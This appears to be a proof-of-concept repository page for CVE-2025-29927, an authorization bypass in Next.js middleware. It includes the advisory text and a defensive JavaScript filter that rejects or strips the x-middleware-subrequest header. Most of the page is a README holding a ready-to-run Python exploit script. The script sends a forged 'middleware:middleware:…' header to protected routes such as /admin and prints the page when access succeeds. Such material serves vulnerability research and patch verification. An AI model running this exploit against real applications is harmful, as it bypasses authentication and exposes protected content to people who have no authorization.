Associated Vulnerability
Title: Authorization Bypass in Next.js Middleware (CVE-2025-29927)

Description: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommended that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.
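The advisory's interim mitigation is to keep external requests carrying `x-middleware-subrequest` away from the Next.js process. The following is an added example (not code from the PoC or from Next.js) of a defender-side filter modelling that edge policy: it decides per request whether to reject or forward, offers a header-stripping alternative, and runs over constructed sample requests; the hostnames and header values in the samples are made up.

```javascript
// Added example: edge/reverse-proxy policy for the CVE-2025-29927 mitigation.
// Not part of the PoC or of Next.js; sample requests below are constructed.

const BLOCKED_HEADER = "x-middleware-subrequest";

// HTTP header names are case-insensitive, so normalise before comparing.
// The decision is value-independent: any presence of the header from an
// external client is suspicious, whatever it contains.
function hasMiddlewareSubrequestHeader(headers) {
  return Object.keys(headers).some((k) => k.toLowerCase() === BLOCKED_HEADER);
}

// Policy A (strict): reject external requests that carry the header with a
// 400 so they never reach the Next.js middleware; everything else passes.
function filterRequest(req) {
  if (hasMiddlewareSubrequestHeader(req.headers)) {
    return { action: "reject", status: 400, reason: `forbidden header: ${BLOCKED_HEADER}` };
  }
  return { action: "forward", status: null, reason: null };
}

// Policy B (lenient): strip the header and forward. Returns a new header
// object; the original is left untouched for logging.
function stripHeader(headers) {
  return Object.fromEntries(
    Object.entries(headers).filter(([k]) => k.toLowerCase() !== BLOCKED_HEADER)
  );
}

// Constructed sample requests (not captured traffic). The second one shows
// that a differently cased name or an arbitrary value is still caught.
const SAMPLE_REQUESTS = [
  { method: "GET", path: "/admin", headers: { host: "app.example", "x-middleware-subrequest": "middleware:middleware:middleware:middleware:middleware" } },
  { method: "GET", path: "/admin", headers: { host: "app.example", "X-Middleware-Subrequest": "constructed-value" } },
  { method: "GET", path: "/", headers: { host: "app.example", "user-agent": "Mozilla/5.0" } },
];

// Audit helper: apply the strict policy to each request and report the outcome.
function auditSamples(requests = SAMPLE_REQUESTS) {
  return requests.map((r) => ({ path: r.path, ...filterRequest(r) }));
}

console.log(JSON.stringify(auditSamples(), null, 2));
```

In a real deployment the same check belongs in the proxy or WAF in front of the application, and rejected requests should be logged, since legitimate clients have no reason to send this header.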
Readme
```python
#!/usr/bin/env python3
import requests
import argparse
import sys


def exploit_nextjs(host, path="/admin", scheme="http",
                   header_value="middleware:middleware:middleware:middleware:middleware",
                   verbose=False):
    """
    Attempts to bypass Next.js middleware using the x-middleware-subrequest header.
    Parameters:
    - host: domain/host with port (e.g., localhost:3000)
    - path: protected route (default: /admin)
    - scheme: 'http' or 'https'
    - header_value: header value used to bypass the middleware
    - verbose: enables detailed debugging information
    """
    headers = {
        "x-middleware-subrequest": header_value,
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.1 Safari/605.1.15"
    }
    url = f"{scheme}://{host}{path}"
    if verbose:
        print(f"[DEBUG] Target URL: {url}")
        print(f"[DEBUG] Headers used: {headers}")
    try:
        response = requests.get(url, headers=headers, timeout=10)
        if verbose:
            print(f"[DEBUG] Response status code: {response.status_code}")
            print(f"[DEBUG] Response headers: {response.headers}")
        if response.status_code == 200:
            print(f"[+] Exploit successful! Access to {url} granted")
            # Slicing already caps the snippet at 500 characters
            snippet = response.text[:500]
            print(f"Response (snippet):\n{snippet}\n")
        else:
            print(f"[-] Exploit failed. Status code: {response.status_code}")
            if verbose:
                print(f"[DEBUG] Full response:\n{response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Request error: {e}")
        sys.exit(1)


if __name__ == "__main__":
    parser = argparse.ArgumentParser(
        description="Exploit for CVE-2025-29927 in Next.js (Controlled Environment)"
    )
    parser.add_argument("--host", required=True,
                        help="Vulnerable application host (e.g., localhost:3000)")
    parser.add_argument("--path", default="/admin",
                        help="Protected route path (default: /admin)")
    parser.add_argument("--scheme", choices=["http", "https"], default="http",
                        help="Protocol to use (http or https)")
    parser.add_argument("--header", default="middleware:middleware:middleware:middleware:middleware",
                        help="Value for the x-middleware-subrequest header")
    parser.add_argument("--verbose", action="store_true",
                        help="Display detailed debugging information")
    args = parser.parse_args()
    print("=== CVE-2025-29927 Exploit ===")
    print("Starting attack in a controlled environment...\n")
    exploit_nextjs(args.host, args.path, args.scheme, args.header, args.verbose)
```
File Snapshot
[4.0K] /data/pocs/8339f1a67dc578df4a1e072e743cbee2ea93df1c
└── [2.8K] README.md
0 directories, 1 file